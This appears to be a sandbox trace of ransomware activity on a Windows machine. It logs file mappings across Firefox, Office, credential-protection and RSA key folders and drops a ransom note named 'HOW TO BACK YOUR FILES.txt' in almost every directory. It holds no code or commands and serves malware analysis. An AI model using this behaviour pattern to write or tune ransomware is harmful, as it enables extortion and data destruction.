Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4, protection = PAGE_READWRITE, maximum_size = 7536 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4, protection = PAGE_READWRITE, maximum_size = 848 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\events\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\events\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\bookmarkbackups\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\bookmarkbackups\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Pending Pings\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Pending Pings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622, protection = PAGE_READWRITE, maximum_size = 784 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Extensions\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Extensions\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\STARTUP\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\STARTUP\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Vault\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Vault\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, protection = PAGE_READWRITE, maximum_size = 380784 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Normal.dotm filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Normal.dotm, protection = PAGE_READWRITE, maximum_size = 18704 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx, protection = PAGE_READWRITE, maximum_size = 495840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Stationery\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Stationery\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_31FD1255772945E99CBED4370F39872D.dat filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_31FD1255772945E99CBED4370F39872D.dat, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Signatures\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Signatures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml, protection = PAGE_READWRITE, maximum_size = 944 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\CREDHIST filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\CREDHIST, protection = PAGE_READWRITE, maximum_size = 1520 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\SYNCHIST filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\SYNCHIST, protection = PAGE_READWRITE, maximum_size = 848 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\20cac00a-26e8-46c6-ab84-90a52b05e557 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\20cac00a-26e8-46c6-ab84-90a52b05e557, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\7a70842e-d6a2-46c1-966c-384a4ef9d347 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\7a70842e-d6a2-46c1-966c-384a4ef9d347, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\ddbd6a25-732f-4175-9949-5cdf51e0bd09 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\ddbd6a25-732f-4175-9949-5cdf51e0bd09, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\Preferred filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\Preferred, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Proof\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Proof\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\PowerPoint\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\PowerPoint\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.srs filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.srs, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.xml filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.xml, protection = PAGE_READWRITE, maximum_size = 3104 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\MSO1033.acl filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\MSO1033.acl, protection = PAGE_READWRITE, maximum_size = 38512 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\index.dat filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\index.dat, protection = PAGE_READWRITE, maximum_size = 912 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\_hiddencm\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\_hiddencm\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Cm\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Cm\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\Global.MPT filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\Global.MPT, protection = PAGE_READWRITE, maximum_size = 1245440 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\MMC\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\MMC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\Chs\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\Chs\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\XLSTART\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\XLSTART\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, protection = PAGE_READWRITE, maximum_size = 3706832 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71, protection = PAGE_READWRITE, maximum_size = 816 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71, protection = PAGE_READWRITE, maximum_size = 816 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
